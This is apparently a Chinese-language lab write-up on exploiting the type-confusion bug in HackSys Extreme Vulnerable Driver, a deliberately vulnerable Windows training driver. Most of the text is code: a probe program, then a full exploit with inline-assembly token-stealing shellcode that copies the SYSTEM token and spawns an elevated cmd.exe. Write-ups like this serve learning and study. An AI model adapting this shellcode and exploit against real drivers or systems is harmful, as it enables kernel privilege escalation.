类型混淆漏洞一般是将数据类型A当做数据类型B来解析引用，这就可能导致非法访问数据从而执行任意代码。
还是熟悉的味道，还是原来的驱动



好家伙，一来就忘我嘴里种水稻，直接call用户缓冲区内容加4个字节。
编写个程序观察打印结果

#include <windows.h>
#include <stdio.h>
int buf[0xf00]{};
HANDLE hDriver;
DWORD dwBytesOut = 0;
int main() {
	hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("[!] Unable to get a handle on the device\n");
		return(-1);
	}
	
	DeviceIoControl(hDriver, 0x222023, buf, 8, 0, 0, &dwBytesOut, NULL);
	return 0;
}

果不其然 直接call 0 去了

我也是醉了 说好的类型混淆漏洞呢，我怀疑是ida解析的问题。。。不管了 反正替换shellcode地址直接提权

#include <windows.h>
#include <stdio.h>
int buf[0xf00]{};
HANDLE hDriver;
DWORD dwBytesOut = 0;
static VOID ShellCode()
{
	_asm
	{
		int 3
		pushad
		mov eax, fs: [124h]		// Find the _KTHREAD structure for the current thread
		mov eax, [eax + 0x50]   // Find the _EPROCESS structure
		mov ecx, eax
		mov edx, 4				// edx = system PID(4)

		// The loop is to get the _EPROCESS of the system
		find_sys_pid :
		mov eax, [eax + 0xb8]	// Find the process activity list
		sub eax, 0xb8    		// List traversal
		cmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PID
		jnz find_sys_pid

		// Replace the Token
		mov edx, [eax + 0xf8]
		mov[ecx + 0xf8], edx
		popad
		//int 3
		ret
	}
}
int main() {
	hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("[!] Unable to get a handle on the device\n");
		return(-1);
	}
	buf[1] = (int)&ShellCode;
	DeviceIoControl(hDriver, 0x222023, buf, 8, 0, 0, &dwBytesOut, NULL);
	STARTUPINFO si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	return 0;
}

他妈的，什么都没学到